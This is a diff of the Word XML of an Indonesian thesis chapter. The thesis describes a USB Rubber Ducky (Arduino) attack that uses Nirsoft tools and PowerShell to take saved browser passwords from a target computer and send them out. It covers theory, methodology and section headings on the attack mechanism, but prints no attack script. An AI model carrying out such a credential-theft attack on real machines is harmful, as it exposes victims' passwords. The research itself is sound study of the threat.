     </w:p>
     <w:p>
       <w:pPr>
@@ -16928,11 +17155,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="35" w:name="_Toc43264820"/>
+      <w:bookmarkStart w:id="41" w:name="_Toc43264820"/>
       <w:r>
         <w:t>Sistematika Penulisan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="35"/>
+      <w:bookmarkEnd w:id="41"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -17127,12 +17354,12 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="36" w:name="_Toc43264821"/>
+      <w:bookmarkStart w:id="42" w:name="_Toc43264821"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Kajian Teori</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="36"/>
+      <w:bookmarkEnd w:id="42"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -17143,7 +17370,7 @@
           <w:iCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc43264822"/>
+      <w:bookmarkStart w:id="43" w:name="_Toc43264822"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -17152,13 +17379,14 @@
         </w:rPr>
         <w:t>Microcontroller</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="37"/>
+      <w:bookmarkEnd w:id="43"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
       </w:pPr>
+      <w:bookmarkStart w:id="44" w:name="_Hlk43330595"/>
       <w:r>
         <w:rPr>
           <w:bCs/>
@@ -17469,6 +17697,7 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="44"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17483,7 +17712,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="38" w:name="_Toc43264823"/>
+      <w:bookmarkStart w:id="45" w:name="_Toc43264823"/>
+      <w:bookmarkStart w:id="46" w:name="_Hlk43330864"/>
       <w:r>
         <w:rPr>
           <w:iCs/>
@@ -17491,7 +17721,7 @@
         </w:rPr>
         <w:t>Arduino</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="38"/>
+      <w:bookmarkEnd w:id="45"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17502,6 +17732,8 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="47" w:name="_Hlk43330951"/>
+      <w:bookmarkEnd w:id="46"/>
       <w:r>
         <w:rPr>
           <w:iCs/>
@@ -17843,6 +18075,7 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="47"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17858,7 +18091,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="39" w:name="_Toc43264824"/>
+      <w:bookmarkStart w:id="48" w:name="_Toc43264824"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -17868,7 +18101,7 @@
       <w:r>
         <w:t>rduino Intergated Development Environment (IDE)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="39"/>
+      <w:bookmarkEnd w:id="48"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18037,7 +18270,7 @@
           <w:i/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="40" w:name="_Toc43264825"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc43264825"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18045,7 +18278,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Password Attack</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="40"/>
+      <w:bookmarkEnd w:id="49"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18242,25 +18475,7 @@
         <w:t>browser</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> memiliki celah keamanan yang cukup berbahaya yaitu tidak adanya enkripsi terhadap </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t xml:space="preserve">username </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">dan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> yang disimpan sehingga sangat memungkinkan untuk diretas dengan berbagai metode seperti </w:t>
+        <w:t xml:space="preserve"> memiliki celah keamanan yang cukup berbahaya sehingga sangat memungkinkan untuk diretas dengan berbagai metode seperti </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18327,14 +18542,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="41" w:name="_Toc43264826"/>
+      <w:bookmarkStart w:id="50" w:name="_Toc43264826"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Nirsoft.net</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="41"/>
+      <w:bookmarkEnd w:id="50"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18344,6 +18559,8 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="51" w:name="_Hlk43333497"/>
+      <w:bookmarkStart w:id="52" w:name="_Hlk43333518"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -18506,6 +18723,7 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="52"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18515,6 +18733,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="53" w:name="_Hlk43333532"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -18561,14 +18780,7 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">ini akan dijalankan pada komputer target menggunakan USB yang telah </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">diprogram sebelumnya sehingga dapat mengambil data password untuk kemudian dikirimkan </w:t>
+        <w:t xml:space="preserve">ini akan dijalankan pada komputer target menggunakan USB yang telah diprogram sebelumnya sehingga dapat mengambil data password untuk kemudian dikirimkan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18590,6 +18802,8 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="51"/>
+      <w:bookmarkEnd w:id="53"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18603,20 +18817,21 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="42" w:name="_Toc43264827"/>
+      <w:bookmarkStart w:id="54" w:name="_Toc43264827"/>
       <w:r>
         <w:t xml:space="preserve">Microsoft </w:t>
       </w:r>
       <w:r>
         <w:t>Powershell</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="42"/>
+      <w:bookmarkEnd w:id="54"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
       </w:pPr>
+      <w:bookmarkStart w:id="55" w:name="_Hlk43333612"/>
       <w:r>
         <w:t>Microsoft</w:t>
       </w:r>
@@ -18761,6 +18976,7 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="55"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18891,17 +19107,18 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="43" w:name="_Toc43264828"/>
+      <w:bookmarkStart w:id="56" w:name="_Toc43264828"/>
       <w:r>
         <w:t>Sistem Operasi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="43"/>
+      <w:bookmarkEnd w:id="56"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
       </w:pPr>
+      <w:bookmarkStart w:id="57" w:name="_Hlk43333641"/>
       <w:r>
         <w:t xml:space="preserve">Sistem operasi merupakan </w:t>
       </w:r>
@@ -19055,13 +19272,14 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="57"/>
     </w:p>
     <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="44" w:name="_Toc43264829"/>
+      <w:bookmarkStart w:id="58" w:name="_Toc43264829"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -19071,13 +19289,14 @@
       <w:r>
         <w:t xml:space="preserve"> (USB)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="44"/>
+      <w:bookmarkEnd w:id="58"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
       </w:pPr>
+      <w:bookmarkStart w:id="59" w:name="_Hlk43333683"/>
       <w:r>
         <w:t>M</w:t>
       </w:r>
@@ -19115,29 +19334,32 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
+        <w:t>komputer</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> dapat mengirim atau mengambil data dari perangkat. Saat ini USB menjadi standar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>industri</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> yang dikembangkan untuk koneksi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>periferal</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> elektronik </w:t>
+      </w:r>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>komputer</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> dapat mengirim atau mengambil data dari perangkat. Saat ini USB menjadi standar </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>industri</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> yang dikembangkan untuk koneksi </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>periferal</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> elektronik seperti keyboard, modem, dan lainnya</w:t>
+        <w:t>seperti keyboard, modem, dan lainnya</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -19184,6 +19406,7 @@
       <w:r>
         <w:t>. Tujuan dikembangkan standar ini adalah untuk mengembangkan antarmuka tunggal yang dapat digunakan di beberapa perangkat dan menghilangkan konektor yang berbeda beda saat ini.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="59"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19310,11 +19533,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="45" w:name="_Toc43264830"/>
+      <w:bookmarkStart w:id="60" w:name="_Toc43264830"/>
       <w:r>
         <w:t>USB Rubber Ducky</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="45"/>
+      <w:bookmarkEnd w:id="60"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19544,11 +19767,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Perintah ini digunakan untuk menentukan berapa lama (milisekon) untuk waktu jeda di antara setiap perintah berikutnya. DEFAULT_DELAY harus </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>berada di awal Ducky script dan berifat opsional. Perintah ini akan lebih berguna saat digu</w:t>
+        <w:t>Perintah ini digunakan untuk menentukan berapa lama (milisekon) untuk waktu jeda di antara setiap perintah berikutnya. DEFAULT_DELAY harus berada di awal Ducky script dan berifat opsional. Perintah ini akan lebih berguna saat digu</w:t>
       </w:r>
       <w:r>
         <w:t>nakan saat melakukan debugging.</w:t>
@@ -19580,6 +19799,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>REM</w:t>
       </w:r>
     </w:p>
@@ -19883,22 +20103,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="11"/>
@@ -19908,7 +20112,6 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Tambahan</w:t>
       </w:r>
     </w:p>
@@ -19936,11 +20139,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="46" w:name="_Toc43264831"/>
-      <w:r>
+      <w:bookmarkStart w:id="61" w:name="_Toc43264831"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Perbandingan dengan penelitian sebelumnya</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="46"/>
+      <w:bookmarkEnd w:id="61"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19950,7 +20154,7 @@
           <w:b w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="47" w:name="_Toc26430686"/>
+      <w:bookmarkStart w:id="62" w:name="_Toc26430686"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -19994,7 +20198,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Perbandingan penelitian sebelumnya</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="47"/>
+      <w:bookmarkEnd w:id="62"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -20198,20 +20402,20 @@
               <w:t>komputer</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">, laptop, dan perangkat lainnya tidak bisa mendeteksi USB sebagai perangkat yang berbahaya </w:t>
+              <w:t xml:space="preserve">, laptop, dan perangkat lainnya tidak bisa mendeteksi USB sebagai perangkat yang berbahaya sehingga melakukan </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+              </w:rPr>
+              <w:t>hacking</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> menggunakan USB bisa sangat mudah dilakukan apabila tidak ada kesadaran dari pemilik </w:t>
             </w:r>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">sehingga melakukan </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-              </w:rPr>
-              <w:t>hacking</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> menggunakan USB bisa sangat mudah dilakukan apabila tidak ada kesadaran dari pemilik perangkat untuk meningkatkan keamanan perangkat itu sendiri.</w:t>
+              <w:t>perangkat untuk meningkatkan keamanan perangkat itu sendiri.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -20412,18 +20616,29 @@
       </w:pPr>
     </w:p>
     <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:ind w:hanging="142"/>
       </w:pPr>
-      <w:bookmarkStart w:id="48" w:name="_Toc43264832"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+      <w:bookmarkStart w:id="63" w:name="_Toc43264832"/>
+      <w:r>
         <w:t>Metodologi Penelitian</w:t>
       </w:r>
-      <w:bookmarkStart w:id="49" w:name="_Toc75146113"/>
-      <w:bookmarkStart w:id="50" w:name="_Toc463344429"/>
-      <w:bookmarkEnd w:id="48"/>
+      <w:bookmarkStart w:id="64" w:name="_Toc75146113"/>
+      <w:bookmarkStart w:id="65" w:name="_Toc463344429"/>
+      <w:bookmarkEnd w:id="63"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -20436,11 +20651,11 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="51" w:name="_Toc43264833"/>
+      <w:bookmarkStart w:id="66" w:name="_Toc43264833"/>
       <w:r>
         <w:t>Metode Konseptual</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="51"/>
+      <w:bookmarkEnd w:id="66"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20530,7 +20745,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="52" w:name="_Toc43258645"/>
+      <w:bookmarkStart w:id="67" w:name="_Toc43258645"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -20582,7 +20797,7 @@
         </w:rPr>
         <w:t>. Metode Konseptual</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="52"/>
+      <w:bookmarkEnd w:id="67"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -20594,7 +20809,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="53" w:name="_Toc43264834"/>
+      <w:bookmarkStart w:id="68" w:name="_Toc43264834"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -20615,7 +20830,7 @@
         </w:rPr>
         <w:t>Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="53"/>
+      <w:bookmarkEnd w:id="68"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20658,7 +20873,7 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1056" type="#_x0000_t75" style="width:191.3pt;height:635.1pt">
+          <v:shape id="_x0000_i1049" type="#_x0000_t75" style="width:191.3pt;height:635.1pt">
             <v:imagedata r:id="rId14" o:title="Sistematika Penelitian"/>
           </v:shape>
         </w:pict>
@@ -20673,7 +20888,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="54" w:name="_Toc43258646"/>
+      <w:bookmarkStart w:id="69" w:name="_Toc43258646"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -20725,7 +20940,7 @@
         </w:rPr>
         <w:t>. Sistematika Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="54"/>
+      <w:bookmarkEnd w:id="69"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -20733,12 +20948,12 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="55" w:name="_Toc43264835"/>
+      <w:bookmarkStart w:id="70" w:name="_Toc43264835"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Inisiasi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="55"/>
+      <w:bookmarkEnd w:id="70"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20760,11 +20975,11 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="56" w:name="_Toc43264836"/>
+      <w:bookmarkStart w:id="71" w:name="_Toc43264836"/>
       <w:r>
         <w:t>Hipotesis</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="56"/>
+      <w:bookmarkEnd w:id="71"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20786,11 +21001,11 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="57" w:name="_Toc43264837"/>
+      <w:bookmarkStart w:id="72" w:name="_Toc43264837"/>
       <w:r>
         <w:t>Simulasi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="57"/>
+      <w:bookmarkEnd w:id="72"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20939,11 +21154,11 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="58" w:name="_Toc43264838"/>
+      <w:bookmarkStart w:id="73" w:name="_Toc43264838"/>
       <w:r>
         <w:t>Akhir</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="58"/>
+      <w:bookmarkEnd w:id="73"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20978,12 +21193,12 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="59" w:name="_Toc43264839"/>
+      <w:bookmarkStart w:id="74" w:name="_Toc43264839"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Pelaporan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="59"/>
+      <w:bookmarkEnd w:id="74"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21003,7 +21218,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="60" w:name="_Toc43264840"/>
+      <w:bookmarkStart w:id="75" w:name="_Toc43264840"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -21050,7 +21265,7 @@
       <w:r>
         <w:t>enyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="60"/>
+      <w:bookmarkEnd w:id="75"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -21061,7 +21276,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="61" w:name="_Toc43264841"/>
+      <w:bookmarkStart w:id="76" w:name="_Toc43264841"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -21069,7 +21284,7 @@
         </w:rPr>
         <w:t>Perancangan Sistem</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="61"/>
+      <w:bookmarkEnd w:id="76"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21222,9 +21437,9 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="62" w:name="_Toc43087604"/>
-      <w:bookmarkStart w:id="63" w:name="_Toc43087898"/>
-      <w:bookmarkStart w:id="64" w:name="_Toc43258875"/>
+      <w:bookmarkStart w:id="77" w:name="_Toc43087604"/>
+      <w:bookmarkStart w:id="78" w:name="_Toc43087898"/>
+      <w:bookmarkStart w:id="79" w:name="_Toc43258875"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -21276,9 +21491,9 @@
         </w:rPr>
         <w:t>. Ilustrasi Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="62"/>
-      <w:bookmarkEnd w:id="63"/>
-      <w:bookmarkEnd w:id="64"/>
+      <w:bookmarkEnd w:id="77"/>
+      <w:bookmarkEnd w:id="78"/>
+      <w:bookmarkEnd w:id="79"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21445,7 +21660,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="65" w:name="_Toc43264842"/>
+      <w:bookmarkStart w:id="80" w:name="_Toc43264842"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -21460,7 +21675,7 @@
         </w:rPr>
         <w:t>Hardware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="65"/>
+      <w:bookmarkEnd w:id="80"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21499,8 +21714,8 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="66" w:name="_Toc43089946"/>
-      <w:bookmarkStart w:id="67" w:name="_Toc43089989"/>
+      <w:bookmarkStart w:id="81" w:name="_Toc43089946"/>
+      <w:bookmarkStart w:id="82" w:name="_Toc43089989"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -21562,8 +21777,8 @@
         </w:rPr>
         <w:t>Harware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="66"/>
-      <w:bookmarkEnd w:id="67"/>
+      <w:bookmarkEnd w:id="81"/>
+      <w:bookmarkEnd w:id="82"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -22230,7 +22445,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="68" w:name="_Toc43264843"/>
+      <w:bookmarkStart w:id="83" w:name="_Toc43264843"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -22245,7 +22460,7 @@
         </w:rPr>
         <w:t>Software</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="68"/>
+      <w:bookmarkEnd w:id="83"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -22272,8 +22487,8 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="69" w:name="_Toc43089947"/>
-      <w:bookmarkStart w:id="70" w:name="_Toc43089990"/>
+      <w:bookmarkStart w:id="84" w:name="_Toc43089947"/>
+      <w:bookmarkStart w:id="85" w:name="_Toc43089990"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -22335,8 +22550,8 @@
         </w:rPr>
         <w:t>Software</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="69"/>
-      <w:bookmarkEnd w:id="70"/>
+      <w:bookmarkEnd w:id="84"/>
+      <w:bookmarkEnd w:id="85"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -23210,7 +23425,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="71" w:name="_Toc43264844"/>
+      <w:bookmarkStart w:id="86" w:name="_Toc43264844"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -23218,7 +23433,7 @@
         </w:rPr>
         <w:t>Mekanisme Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="71"/>
+      <w:bookmarkEnd w:id="86"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -23669,9 +23884,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="72" w:name="_Toc43087605"/>
-      <w:bookmarkStart w:id="73" w:name="_Toc43087899"/>
-      <w:bookmarkStart w:id="74" w:name="_Toc43258876"/>
+      <w:bookmarkStart w:id="87" w:name="_Toc43087605"/>
+      <w:bookmarkStart w:id="88" w:name="_Toc43087899"/>
+      <w:bookmarkStart w:id="89" w:name="_Toc43258876"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -23723,9 +23938,9 @@
         </w:rPr>
         <w:t>. Alur Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="72"/>
-      <w:bookmarkEnd w:id="73"/>
-      <w:bookmarkEnd w:id="74"/>
+      <w:bookmarkEnd w:id="87"/>
+      <w:bookmarkEnd w:id="88"/>
+      <w:bookmarkEnd w:id="89"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -23765,8 +23980,8 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="75" w:name="_Toc43089948"/>
-      <w:bookmarkStart w:id="76" w:name="_Toc43089991"/>
+      <w:bookmarkStart w:id="90" w:name="_Toc43089948"/>
+      <w:bookmarkStart w:id="91" w:name="_Toc43089991"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -23819,8 +24034,8 @@
         </w:rPr>
         <w:t>. Kerentanan dan Ancaman</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="75"/>
-      <w:bookmarkEnd w:id="76"/>
+      <w:bookmarkEnd w:id="90"/>
+      <w:bookmarkEnd w:id="91"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -24647,7 +24862,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="77" w:name="_Toc43264845"/>
+      <w:bookmarkStart w:id="92" w:name="_Toc43264845"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -24655,7 +24870,7 @@
         </w:rPr>
         <w:t>Pengembangan Sistem</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="77"/>
+      <w:bookmarkEnd w:id="92"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -24731,7 +24946,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="78" w:name="_Toc43264846"/>
+      <w:bookmarkStart w:id="93" w:name="_Toc43264846"/>
       <w:r>
